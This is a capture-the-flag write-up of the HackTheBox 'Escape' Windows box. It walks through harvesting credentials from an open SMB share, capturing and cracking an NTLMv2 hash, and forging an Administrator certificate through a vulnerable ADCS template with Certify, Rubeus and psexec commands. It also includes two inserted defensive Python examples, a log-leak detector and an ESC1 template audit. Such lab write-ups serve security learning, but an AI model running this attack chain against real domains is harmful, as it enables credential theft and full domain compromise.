pheelbert

We're all earthlings

2 June 2023

HackTheBox: Escape

[Image: box information card]

Introduction

No introduction needed! Here’s a link to the badge of completion for this box.

Recon

Perform a full port scan on the box:

nmap -sV --version-all -p- -T5 10.10.11.202

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2023-05-30 03:56:31Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
1433/tcp  open  ms-sql-s      syn-ack Microsoft SQL Server 2019 15.00.2000
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49668/tcp open  msrpc         syn-ack Microsoft Windows RPC
49687/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49688/tcp open  msrpc         syn-ack Microsoft Windows RPC
49700/tcp open  msrpc         syn-ack Microsoft Windows RPC
49710/tcp open  msrpc         syn-ack Microsoft Windows RPC
49722/tcp open  msrpc         syn-ack Microsoft Windows RPC

SMB/445

When I see SMB, the first thing I do is check the available shares (e.g. with CrackMapExec):

$ crackmapexec smb 10.10.11.202 -u '' -p '' --shares

Doing so reveals the Public share with a PDF file containing read-only credentials for the MSSQL service running on the box.

Searching for secrets

Using Metasploit’s admin/mssql/mssql_ntlm_stealer module, it is possible to capture the NTLMv2-SSP hash for the sql_svc user by providing our read-only credentials and running an interception tool such as Responder.

Responder output:

[SMB] NTLMv2-SSP Client   : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:3ad4698fb4bb5c...

This hash can be cracked with Hashcat using mode 5600 (NetNTLMv2). The rule file may not be necessary; I typically run rules since I have access to a good cracking rig:

hashcat -m 5600 hashes.lst /srv/wordlists/rockyou.txt -r /srv/rules/OneRuleToRuleThemAll.rule

Foothold

Using the cracked credentials for sql_svc, we can enumerate Active Directory with BloodHound. The user is not a local administrator, but is a member of the Remote Management Users group. I tried logging in with Impacket’s (wmi|ps|smb|at)exec.py scripts but none worked, and neither did CrackMapExec; evil-winrm, however, worked like a charm and got me an interactive shell on the box.

Privilege escalation

Once on the file system, the next step was to look for log files in C:\SQLServer\Logs\, which contained entries showing a user trying, and failing, to log in to the database with their domain credentials. From this new user context (again via evil-winrm), PKI abuse enumeration had to be done.
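The pattern in that log (a failed domain logon followed shortly by an "unknown login" failure from the same client, whose "user name" is really a secret typed in the wrong field) is something a defender can hunt for offline in SQL Server ERRORLOG files. The following is an added example and not part of the original write-up: the ERRORLOG excerpt is constructed, with invented account names and an invented mistyped secret, and the detector reports only the shape of the leaked string, never the string itself.

```python
import re
from datetime import datetime, timedelta

# Constructed SQL Server ERRORLOG excerpt (not the real log from the box): a domain
# user fails with a wrong password, then four seconds later the same client "fails"
# with a login name that is not an account at all, i.e. a secret typed in the wrong field.
SAMPLE_ERRORLOG = "\n".join([
    "2023-05-30 03:55:10.12 Logon       Error: 18456, Severity: 14, State: 8.",
    "2023-05-30 03:55:10.12 Logon       Login failed for user 'sequel.htb\\Alice.Example'. "
    "Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]",
    "2023-05-30 03:55:14.40 Logon       Error: 18456, Severity: 14, State: 5.",
    "2023-05-30 03:55:14.40 Logon       Login failed for user 'Wr0ng-F13ld-Example!'. "
    "Reason: Could not find a login matching the name provided. [CLIENT: 10.0.0.5]",
    "2023-05-30 03:57:01.00 Logon       Login failed for user 'sequel.htb\\svc_example'. "
    "Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.9]",
    "2023-05-30 03:58:30.55 Logon       Login failed for user 'reporting_ro'. "
    "Reason: Could not find a login matching the name provided. [CLIENT: 10.0.0.20]",
])

# One "Login failed" line: timestamp, quoted user, reason text, client address.
LOGIN_FAILED_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'\. Reason: (?P<reason>.+?)\s*"
    r"\[CLIENT: (?P<client>[^\]]+)\]\s*$"
)
# DOMAIN\sam, bare SQL login, or UPN; anything else is unusual in the user-name field.
ACCOUNT_NAME_RE = re.compile(r"^(?:[A-Za-z0-9._$\-]+\\)?[A-Za-z0-9._$\-]+(?:@[A-Za-z0-9.\-]+)?$")


def parse_failed_logins(text):
    """Return failed-login events (dicts) from ERRORLOG text, oldest first."""
    events = []
    for line in text.splitlines():
        m = LOGIN_FAILED_RE.match(line)
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
            "user": m["user"],
            "reason": m["reason"].lower(),
            "client": m["client"],
        })
    return events


def find_credential_leaks(text, window_seconds=60):
    """Flag unknown-login failures that follow a wrong-password failure from the same client."""
    events = parse_failed_logins(text)
    findings = []
    for i, ev in enumerate(events):
        if "could not find a login" not in ev["reason"]:
            continue
        # walk back in time, but only within the correlation window
        for prev in reversed(events[:i]):
            if ev["ts"] - prev["ts"] > timedelta(seconds=window_seconds):
                break
            if prev["client"] == ev["client"] and "password did not match" in prev["reason"]:
                findings.append({
                    "ts": ev["ts"].isoformat(sep=" "),
                    "client": ev["client"],
                    "account": prev["user"],
                    # never copy the candidate secret into a report; keep only its shape
                    "secret_length": len(ev["user"]),
                    "looks_like_account": bool(ACCOUNT_NAME_RE.match(ev["user"])),
                })
                break
    return findings


if __name__ == "__main__":
    for f in find_credential_leaks(SAMPLE_ERRORLOG):
        print(f"{f['ts']} client={f['client']} account={f['account']} "
              f"probable secret of {f['secret_length']} chars in user-name field "
              f"(looks_like_account={f['looks_like_account']})")
```

The correlation window and the `looks_like_account` flag are the tuning points: a mistyped secret that happens to look like a plain login name still gets reported as long as it follows a wrong-password failure from the same client, it is just marked as lower confidence. The fix on the server side is the same either way: rotate the account's password and restrict who can read the SQL Server log directory.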

Using Certify, this can be done with the following commands from our new user context, Ryan.Cooper. It can also be done entirely with Python tooling instead of running directly on the compromised host.

  1. List vulnerable certificate templates:
     $ Certify.exe find /vulnerable

  2. Request a certificate from the vulnerable template, supplying an alternate name for a user that has admin rights on the host:
     $ Certify.exe request /ca:dc.sequel.htb\\sequel-DC-CA /template:UserAuthentication /altname:Administrator

  3. Copy the certificate contents to a file and convert it from .pem to .pfx (done on the Linux box):
     $ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

  4. Request a TGT using the certificate (outputs a base64 blob):
     $ Rubeus.exe asktgt /user:Administrator /certificate:c:\\Windows\\Temp\\cert.pfx /nowrap

  5. Convert the base64 blob to a .ccache for use on Linux:
     $ python3 rubeustoccache.py <rubeus_base64_output_nowrap> administrator.kirbi administrator.ccache

  6. Get an interactive shell on the host using Impacket’s psexec by passing the ticket:
     $ sudo ntpdate DC.sequel.htb
     $ export KRB5CCNAME=administrator.ccache
     $ psexec.py sequel.htb/Administrator@DC.sequel.htb -k -no-pass
    

Kerberos authentication requires working DNS; here are the contents of /etc/resolv.conf:

search sequel.htb
nameserver 10.10.11.202
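What Certify's find /vulnerable (step 1 above) reports is a specific combination of template settings, and that same combination is what a defender should audit for across every published template before someone else does. The following is an added example, not the write-up's or Certify's code: the attribute names and flag bits are the real msPKI-* ones from the ADCS template schema, but both template records are constructed; the first mirrors the conditions abused on UserAuthentication in the write-up (its real attribute values are not on the page), the second is a hardened variant.

```python
# Added example: offline ESC1 audit over certificate-template attributes as stored in
# AD (CN=Certificate Templates,CN=Public Key Services,...). The constants are the real
# MS-CRTD flag bits; the template records further down are constructed for illustration.

CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # msPKI-Certificate-Name-Flag
CT_FLAG_SUBJECT_ALT_REQUIRE_UPN = 0x02000000     # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # msPKI-Enrollment-Flag (manager approval)

CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
BROAD_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone", "Users"}


def esc1_conditions(t):
    """Map each ESC1 precondition to whether the template meets it (all must hold for ESC1)."""
    ekus = set(t.get("pKIExtendedKeyUsage", []))
    return {
        "published on an enterprise CA": bool(t.get("published_on_ca", False)),
        "no manager approval required": not (t.get("msPKI-Enrollment-Flag", 0) & CT_FLAG_PEND_ALL_REQUESTS),
        "no authorized signatures required": t.get("msPKI-RA-Signature", 0) == 0,
        # an empty EKU list means the certificate is usable for any purpose
        "EKU permits client authentication": not ekus or bool(ekus & CLIENT_AUTH_EKUS),
        "enrollee supplies subject (SAN controllable)": bool(
            t.get("msPKI-Certificate-Name-Flag", 0) & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "broad groups hold Enroll rights": bool(set(t.get("enroll_principals", [])) & BROAD_PRINCIPALS),
    }


def is_esc1_vulnerable(t):
    return all(esc1_conditions(t).values())


def audit_templates(templates):
    """Template name -> True if every ESC1 precondition holds."""
    return {t["name"]: is_esc1_vulnerable(t) for t in templates}


def remediation(t):
    """Changes that each break one ESC1 precondition; any single one closes the path."""
    c = esc1_conditions(t)
    fixes = []
    if c["enrollee supplies subject (SAN controllable)"]:
        fixes.append("clear CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT and set CT_FLAG_SUBJECT_ALT_REQUIRE_UPN "
                     "so the CA builds the SAN from the requester's AD object")
    if c["no manager approval required"]:
        fixes.append("set CT_FLAG_PEND_ALL_REQUESTS (CA certificate manager approval)")
    if c["broad groups hold Enroll rights"]:
        broad = sorted(set(t.get("enroll_principals", [])) & BROAD_PRINCIPALS)
        fixes.append("remove Enroll from " + ", ".join(broad))
    return fixes


TEMPLATES = [
    {   # mirrors the conditions abused in the write-up; attribute values are constructed
        "name": "UserAuthentication",
        "published_on_ca": True,
        "msPKI-Enrollment-Flag": 0x0,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"],
        "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "enroll_principals": ["Domain Users", "Domain Admins"],
    },
    {   # hardened variant: SAN built from AD, manager approval, narrow enrollment group
        "name": "UserAuthentication-hardened",
        "published_on_ca": True,
        "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "msPKI-Certificate-Name-Flag": CT_FLAG_SUBJECT_ALT_REQUIRE_UPN,
        "enroll_principals": ["PKI-UserAuth-Enrollers"],
    },
]

if __name__ == "__main__":
    for t in TEMPLATES:
        print(t["name"], "ESC1" if is_esc1_vulnerable(t) else "ok")
        for fix in remediation(t):
            print("  -", fix)
```

The records here are plain dicts so the logic runs offline; in practice they would be filled from an LDAP dump of the template container plus the CA's published-template list and the Enroll ACEs on each template. Breaking any one of the six conditions is enough, but the SAN flag is the one to fix first, since it is the property that lets a request for one user produce a certificate for another.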

Conclusion

This box was great for me to test out Sliver and Mythic as well as PKI abuse. Respect to Geiseric for their work! I’m not sure if there were any hints regarding ADCS being abusable, but I’m guessing this should be part of every pentester’s toolkit and general reconnaissance steps.